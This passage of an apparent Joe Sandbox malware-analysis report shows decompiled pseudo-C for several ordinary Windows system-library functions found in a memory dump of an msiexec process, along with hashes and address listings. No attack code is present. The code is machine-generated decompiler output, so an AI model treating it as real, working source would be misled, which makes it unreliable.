                              0x04dd74b5
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction ID: 77b93ae88ce4a75bb9d9ebcbb529484ace06b1b6641c8dbcfaee4bdbe4bab157
                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction Fuzzy Hash: 33518C71600606EFDB16CF54C584A96BBB5FF45308F14C0AAE9089F266E371FA46CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D32990 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              C-Code - Quality: 97%
                              			E04D32990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4ddff00);
				E04D5D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4ce1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04D4E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4ce1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04D851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4ce166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04D32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04D16600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04D32C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04D32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04D32C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04D32ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04D5D0D1(_t62);
				goto L28;
			}





















                              0x04d32990
                              0x04d32992
                              0x04d32997
                              0x04d329a3
                              0x04d329a6
                              0x04d329ab
                              0x04d329ad
                              0x04d329b2
                              0x04d75c80
                              0x04d329b8
                              0x04d329b8
                              0x04d329bb
                              0x04d329c0
                              0x04d329c5
                              0x04d329c6
                              0x04d329c6
                              0x04d329cb
                              0x00000000
                              0x00000000
                              0x04d329cd
                              0x04d329d0
                              0x04d329d9
                              0x04d329db
                              0x04d329dd
                              0x04d32a7f
                              0x04d32a84
                              0x04d32a87
                              0x04d32a89
                              0x04d75ca1
                              0x04d75ca3
                              0x00000000
                              0x04d32a8f
                              0x04d32a8f
                              0x00000000
                              0x04d32a8f
                              0x00000000
                              0x04d329e3
                              0x04d329e3
                              0x04d329e3
                              0x00000000
                              0x04d329e3
                              0x04d329dd
                              0x00000000
                              0x04d329db
                              0x04d329e6
                              0x04d329e9
                              0x04d329eb
                              0x04d329ed
                              0x04d329f3
                              0x04d329f5
                              0x04d329f8
                              0x04d329fa
                              0x04d32a97
                              0x04d32a9a
                              0x04d32a9d
                              0x04d32add
                              0x00000000
                              0x04d32a9f
                              0x04d32aa2
                              0x04d32aa5
                              0x04d32aa8
                              0x04d32aab
                              0x04d75cab
                              0x04d75caf
                              0x04d75cc5
                              0x04d75cda
                              0x04d75cdc
                              0x04d75cdf
                              0x04d75ce5
                              0x00000000
                              0x04d75ceb
                              0x04d75ced
                              0x04d75cee
                              0x00000000
                              0x04d75cee
                              0x04d75cb1
                              0x04d75cb4
                              0x04d75cb9
                              0x04d75cbb
                              0x00000000
                              0x04d75cbd
                              0x04d75cbd
                              0x00000000
                              0x04d75cbd
                              0x04d75cbb
                              0x04d32ab1
                              0x04d32ab1
                              0x04d32ac4
                              0x04d32ac6
                              0x04d32ac6
                              0x00000000
                              0x04d32ac6
                              0x04d32aab
                              0x00000000
                              0x04d32a00
                              0x04d32a09
                              0x04d32a0e
                              0x04d32a21
                              0x04d32a24
                              0x04d32a35
                              0x04d32a3a
                              0x04d32a3d
                              0x04d32a42
                              0x04d32a59
                              0x04d32a59
                              0x04d32a5c
                              0x04d32a5f
                              0x04d32a5f
                              0x04d329fa
                              0x04d329f3
                              0x04d32a64
                              0x04d32a64
                              0x04d32a6b
                              0x04d32a6b
                              0x04d32a6d
                              0x04d32a72
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1327b5c5f3763e63cec69d8f95bb7b434c2c148173e2ee5c52d8ac29a710c249
                              • Instruction ID: e9c404aec5160e3e500029895588550ffe785323e35de1762dfd292a2d84ffff
                              • Opcode Fuzzy Hash: 1327b5c5f3763e63cec69d8f95bb7b434c2c148173e2ee5c52d8ac29a710c249
                              • Instruction Fuzzy Hash: D7514471E00219EFDF25DF95C880AEEBBB5FF48314F148095E801AB220D731E992DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D34D3B Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E04D34D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4dfd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04D4FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4df7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04D4B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04D24620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04D0CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04D4B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04D4F380(_t67 + 0xc, 0x4ce5138, 0x10) == 0) {
								 *0x4df60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04D34F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04D34E70(0x4df86b0, 0x4d35690, 0, 0) != 0) {
					_t46 = E04D0CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                              0x04d34d3b
                              0x04d34d4d
                              0x04d34d53
                              0x04d34d58
                              0x04d34d65
                              0x04d34d6c
                              0x04d34d71
                              0x04d34d77
                              0x04d34d7f
                              0x04d34d8c
                              0x04d34d8e
                              0x04d34dad
                              0x04d34db0
                              0x04d34db7
                              0x04d34db8
                              0x04d34db9
                              0x04d34dba
                              0x04d34dbb
                              0x04d34dc1
                              0x04d34dc8
                              0x04d34dcc
                              0x04d34dd5
                              0x04d34dde
                              0x04d34ddf
                              0x04d34de0
                              0x04d34de1
                              0x04d34de6
                              0x04d34de7
                              0x04d34de9
                              0x04d34df3
                              0x00000000
                              0x00000000
                              0x04d76c7c
                              0x04d76c8a
                              0x04d76c8a
                              0x04d76c9d
                              0x04d76ca7
                              0x04d76cac
                              0x04d76cb2
                              0x04d76cb9
                              0x00000000
                              0x04d76cbf
                              0x04d76cbf
                              0x00000000
                              0x04d76cbf
                              0x04d76cb9
                              0x04d34dfb
                              0x04d76ccf
                              0x04d76cd3
                              0x04d34e32
                              0x04d34e39
                              0x04d76ce0
                              0x04d76cf2
                              0x04d76cf2
                              0x04d76ce0
                              0x04d34e3f
                              0x04d34e41
                              0x04d34e51
                              0x04d34e51
                              0x04d34e03
                              0x04d34e03
                              0x04d34e09
                              0x04d34e0f
                              0x04d34e57
                              0x00000000
                              0x00000000
                              0x04d34e1b
                              0x04d34e30
                              0x04d34e5b
                              0x04d34e5b
                              0x00000000
                              0x04d34e30
                              0x04d34e11
                              0x04d34e11
                              0x04d34e16
                              0x00000000
                              0x04d34e16
                              0x04d34e01
                              0x00000000
                              0x04d34e01
                              0x04d34da5
                              0x04d76c6b
                              0x00000000
                              0x04d34dab
                              0x04d34dab
                              0x00000000
                              0x04d34dab

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d17dc52681d8ff29c720a508dbfc61508d73a46222525887c26e6d0564728184
                              • Instruction ID: 4233418489ff95f62afcaaeadc292857a2d653ee7a2345b49c939a1c6a7b369e
                              • Opcode Fuzzy Hash: d17dc52681d8ff29c720a508dbfc61508d73a46222525887c26e6d0564728184
                              • Instruction Fuzzy Hash: DD41A271B40318AFEB31DF14CD80F6ABBA9EB45715F0440AAE945A7280E778FD44CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D34BAD Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E04D34BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4dfd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04D0CC50(_t86);
					L11:
					return E04D4B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4df8504
				E04D22280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04D4FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04D4B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04D24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04D0CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4df8504
								E04D1FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04D34F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                              0x04d34bad
                              0x04d34bbf
                              0x04d34bc2
                              0x04d34bc6
                              0x04d34bcd
                              0x04d34bd9
                              0x04d767fe
                              0x04d76800
                              0x04d34ccc
                              0x04d34ccd
                              0x04d34cb7
                              0x04d34cc9
                              0x04d34cc9
                              0x04d34bdf
                              0x04d34be5
                              0x00000000
                              0x00000000
                              0x04d34beb
                              0x04d34bef
                              0x00000000
                              0x00000000
                              0x04d34bf5
                              0x04d34bf9
                              0x04d34c06
                              0x04d34c0b
                              0x04d34c17
                              0x04d34c1c
                              0x04d34c1f
                              0x04d34c25
                              0x04d34c33
                              0x04d34c3d
                              0x04d34c40
                              0x04d34c43
                              0x04d34c47
                              0x04d34c4d
                              0x04d34c53
                              0x04d34c54
                              0x04d34c55
                              0x04d34c56
                              0x04d34c5b
                              0x04d34c5c
                              0x04d34c63
                              0x04d34c6b
                              0x00000000
                              0x00000000
                              0x04d76776
                              0x04d76784
                              0x04d76784
                              0x04d7679f
                              0x04d767a7
                              0x04d767af
                              0x04d767ce
                              0x00000000
                              0x04d767b1
                              0x04d767b7
                              0x04d767b8
                              0x04d767c1
                              0x04d767d3
                              0x04d767d9
                              0x04d767dd
                              0x04d34c94
                              0x04d34c94
                              0x04d34c98
                              0x04d34c9c
                              0x04d34ca3
                              0x04d767f4
                              0x04d767f4
                              0x04d34cb5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d34cb5
                              0x04d34c79
                              0x04d34c7e
                              0x04d34c89
                              0x04d34c8b
                              0x04d34c8f
                              0x04d34c8f
                              0x00000000
                              0x04d34c89
                              0x04d767c3
                              0x00000000
                              0x04d767c3
                              0x04d767af
                              0x04d34c73
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 64a1cd9afced1105e1c26f762e8b5ed75904676693cfa3865d7ac85fef84ab9b
                              • Instruction ID: 2790fd90fd1185791ec491f57d6e08a0f1952790bd84693a66dfe2ea27256dab
                              • Opcode Fuzzy Hash: 64a1cd9afced1105e1c26f762e8b5ed75904676693cfa3865d7ac85fef84ab9b
                              • Instruction Fuzzy Hash: 55419535B006289BDB21DF64C940BEA77B4FF45B50F0105A5E948AB240EB78FE85CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DCAA16 Relevance: .1, Instructions: 120COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04DCAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E04DCABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E04DCAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E04DCAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E04DACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L04D277F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04D27D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04DC131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E04DACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                              0x04dcaa1f
                              0x04dcaa21
                              0x04dcaa23
                              0x04dcaa2b
                              0x04dcaa30
                              0x04dcaa36
                              0x04dcaa39
                              0x04dcaa42
                              0x04dcaa75
                              0x04dcaa7a
                              0x04dcaa7c
                              0x04dcaa7c
                              0x04dcaa88
                              0x04dcaa8a
                              0x04dcaa8f
                              0x04dcab02
                              0x04dcab04
                              0x04dcaa99
                              0x04dcaaa8
                              0x04dcaaaf
                              0x04dcaab3
                              0x04dcaacc
                              0x04dcaad1
                              0x04dcaad6
                              0x04dcaae0
                              0x04dcaaf3
                              0x04dcaaf9
                              0x04dcaafe
                              0x04dcaafe
                              0x04dcaaf3
                              0x04dcaad6
                              0x04dcaab3
                              0x04dcab07
                              0x04dcab0a
                              0x04dcab11
                              0x04dcab23
                              0x04dcab13
                              0x04dcab1c
                              0x04dcab1c
                              0x04dcab2b
                              0x04dcab44
                              0x04dcab44
                              0x04dcab51
                              0x04dcab51
                              0x04dcaa44
                              0x04dcaa47
                              0x04dcaa4c
                              0x00000000
                              0x00000000
                              0x04dcaa5a
                              0x04dcaa64
                              0x04dcaa72
                              0x00000000
                              0x04dcaa66
                              0x04dcaa66
                              0x04dcaa68
                              0x04dcaa6a
                              0x00000000
                              0x04dcaa6a

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction ID: b5c1f8c97bc24429816f5505650686044885b54e68fa5dea47376d005aa38aec
                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction Fuzzy Hash: C031F372B0011A6BEB158B65C845BAFFBABEF84314F05806DE815E7391DA74ED00CA60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D18A0A Relevance: .1, Instructions: 120COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E04D18A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4dfd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04D4B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04D1E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4ce1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04D31DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04D43C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04D18999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                              0x04d18a0a
                              0x04d18a1c
                              0x04d18a23
                              0x04d18a2e
                              0x04d18a30
                              0x04d18a36
                              0x04d18a3c
                              0x04d18a3e
                              0x04d18a4a
                              0x04d18a52
                              0x04d18a9c
                              0x04d18aae
                              0x04d18a58
                              0x04d18a5e
                              0x04d18a6a
                              0x04d18a6f
                              0x04d18a75
                              0x04d18a7d
                              0x04d18a85
                              0x04d18a86
                              0x04d18a89
                              0x04d18a93
                              0x04d18a99
                              0x04d18a9b
                              0x00000000
                              0x04d18aaf
                              0x04d18abe
                              0x04d18ac3
                              0x04d18acb
                              0x04d18ad7
                              0x04d18ae0
                              0x04d18af1
                              0x00000000
                              0x04d18af1
                              0x04d18acd
                              0x04d18ad5
                              0x04d18afb
                              0x04d18afd
                              0x04d18aff
                              0x04d18b07
                              0x04d18b22
                              0x04d18b24
                              0x04d18b2a
                              0x04d18b2e
                              0x04d18b3f
                              0x04d18b78
                              0x04d18b41
                              0x04d18b52
                              0x04d18b54
                              0x04d18b5c
                              0x04d18b74
                              0x04d18b74
                              0x04d18b5c
                              0x04d18b3f
                              0x04d18b5e
                              0x04d18b61
                              0x04d18b64
                              0x04d18b64
                              0x04d18b6c
                              0x04d18b6c
                              0x04d18b11
                              0x04d69cd5
